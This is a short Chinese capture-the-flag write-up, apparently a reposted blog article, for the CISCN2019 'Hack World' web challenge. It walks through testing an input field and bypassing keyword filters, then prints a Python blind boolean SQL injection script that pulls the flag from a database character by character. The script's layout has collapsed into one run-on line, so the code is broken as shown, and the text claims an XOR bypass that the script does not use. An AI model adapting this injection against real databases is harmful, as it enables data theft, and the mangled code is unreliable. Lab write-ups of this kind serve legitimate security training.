web：[CISCN2019 华北赛区 Day2 Web1]Hack World

本文主要是介绍web：[CISCN2019 华北赛区 Day2 Web1]Hack World，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

题目

打开页面，页面提示为，想要的都在‘flag’表和‘flag’列里

随便输入一个数字看回显（1 2 3），发现回显不一样

输入1

输入2

输入3

输入4

输入单引号，显示bool（false）

尝试一下万能密码 1' or 1=1#

发现有过滤

这里使用了bp抓包，发现关键字都被过滤了

这里用异或算法进行绕过

采用大佬的脚本

importrequestss=requests.session()flag =''for iin range(1,50):for j in'-{abcdefghijklmnopqrstuvwxyz0123456789}':url="http://383826c2-f283-449b-9b7d-c64321040ddc.node4.buuoj.cn:81/index.php"sqls="if(ascii(substr((select(flag)from(flag)),{},1))=ascii('{}'),1,2)".format(i,j)data={"id":sqls}c = s.post(url,data=data,timeout=10)if 'Hello' in c.text:flag += jprint(flag)break

得到flag

参考文章链接：

[CISCN2019 华北赛区 Day2 Web1]Hack World-安全小天地

BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World_小小橘颂子的博客-CSDN博客

这篇关于web：[CISCN2019 华北赛区 Day2 Web1]Hack World的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---